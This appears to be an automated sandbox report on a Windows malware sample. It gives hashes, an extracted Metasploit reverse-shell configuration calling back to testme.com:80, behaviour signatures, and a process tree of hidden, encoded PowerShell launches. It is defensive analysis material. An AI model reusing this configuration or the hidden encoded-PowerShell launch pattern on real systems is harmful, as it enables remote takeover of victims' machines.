Analysis
max time kernel: 150s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-06-2024 21:48
Static task: static1
Behavioral task: behavioral1
  Sample: 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
  Resource: win10v2004-20240611-en
General
Target: 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
Size: 457KB
MD5: 03f9fd2ed89de09d2dbed8de06f8fe76
SHA1: 4abfa12b785713bcb8a8d07175114dc903196fc3
SHA256: ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624
SHA512: f11a7029308abaa10f5b5cda1c04997f24d3e275b101533a15aa74645b05ed102f448002bfdeb2df86ca6651ab707eaa20fa1e1835851dc18754b2fdeb9ff1d3
SSDEEP: 6144:x9JLFprEWDl7s5t38dX6pKE4dU7kpoTcnFOHuln+Otc+EkzI8jSejCE8aKP3sGvt:x99gbP/GFK9ACwdag/2OuV8IRCg
Malware Config
Extracted: metasploit, encoder/shikata_ga_nai
Extracted: metasploit, windows/reverse_tcp_dns, testme.com:80
Signatures
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
Blocklisted process makes network request (7 IoCs)
Processes (flow / pid / process):
  24 / 5004 / powershell.exe (7 identical entries)
Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Run PowerShell and hide display window.
Processes (pid / process):
  1988 / powershell.exe
  3644 / powershell.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes (description / ioc / process):
  Key value queried / \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation / 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes (pid / process):
  3644 / powershell.exe (2 entries)
  1988 / powershell.exe (2 entries)
  5004 / powershell.exe (2 entries)
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes (description / pid / process):
  Token: SeDebugPrivilege / 3644 / powershell.exe
  Token: SeDebugPrivilege / 1988 / powershell.exe
  Token: SeDebugPrivilege / 5004 / powershell.exe
Suspicious use of WriteProcessMemory (15 IoCs)
Processes (description / pid / process / target process):
  PID 720 wrote to memory of 3644 / 720 / 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe / powershell.exe (3 entries)
  PID 3644 wrote to memory of 1988 / 3644 / powershell.exe / powershell.exe (3 entries)
  PID 1988 wrote to memory of 5004 / 1988 / powershell.exe / powershell.exe (3 entries)
  PID 5004 wrote to memory of 4484 / 5004 / powershell.exe / csc.exe (3 entries)
  PID 4484 wrote to memory of 4776 / 4484 / csc.exe / cvtres.exe (3 entries)
Processes
Level 1: C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"
  PID: 720
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  Level 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand 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
    PID: 3644
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand 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
      PID: 1988
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
        PID: 5004
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        Level 5: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline"
          PID: 4484
          - Suspicious use of WriteProcessMemory
          Level 6: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES414F.tmp" "c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP"
            PID: 4776
Network
MITRE ATT&CK Enterprise v15
Downloads